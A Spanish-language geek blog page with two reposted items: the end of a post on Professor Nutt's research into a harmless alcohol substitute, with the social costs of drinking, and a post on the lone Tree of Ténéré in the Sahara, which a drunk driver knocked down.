A pesar de todo, el equipo investigador, liderado por el profesor Nutt, cree que todo son ventajas. Esta sustancia no afecta a otras zonas del cerebro, y por tanto no tendría los cambios de humor asociados ni el efecto adictivo del alcohol. La existencia de antídotos eficaces supondría también la reducción de accidentes relacionados con el consumo de alcohol. Además, el etanol excedente se podría utilizar como combustible.

Las compañías productoras de bebidas alcohólicas no han mostrado ningún interés, ya que la investigación farmacéutica queda fuera de su campo de actividad, sin embargo podrían ser las autoridades las interesadas en tener un sustituto inocuo del alcohol.

Los costes asociados al consumo de alcohol son terribles. Sólo en el Reino Unido, se calcula que el coste de atenciones médicas directamente relacionadas con borracheras son de 2.700 millones de libras anuales, y las pérdidas por absentismo laboral debido a resacas podrían llegar a 20.000 millones. El alcohol está relacionado de alguna forma con el 65% de los suicidios, el 40% de los casos de violencia doméstica y el 15% de los ahogamientos, entre otros.

Vía | Genciencia
Continuar leyendo...

6.1.10

El árbol de Teneré



La fecha de toma de ésta imagen es de 1961 y muestra un árbol que si bien se nota, está solo. Se encontraba en Teneré una región de desierto en el sur central del Saharael y era en realidad una Acacia que fue conocida como el árbol más aislado del mundo. Este árbol era el único que existía en una zona de 400 kilómetros a su alrededor.




El árbol era el último superviviente de un grupo de acacias que creció cuando el desierto no era tan seco. Cuando los científicos excavaron un hoyo cercano al árbol, descubrieron que sus raíces alcanzaban una increíble profundidad de 36 metros, hasta la tabla del agua.

Su desaparición se debio a algo muy curioso y poco probable ya que un camionero ebrio choco con el árbol, derribandolo y acabando con su vida; habiendo tantos kilómetros por donde viajar tuvo que chocar exactamente con el :P



Ahora, en su lugar existe una escultura de metal erigida para conmemorar al árbol solitario de Ténéré.

Vía | Maikelnai's blog
Continuar leyendo...
 

Estadísticas

Geeks
blogspot hit counter

Geeks Online

Home | Aplicaciones | CUH | Interesantes-Noticias | Juegos | Programación | Tutoriales | Videos


Sector Geek :: Un geek con ocio Copyright © 2008-2010 Community is Designed by Bie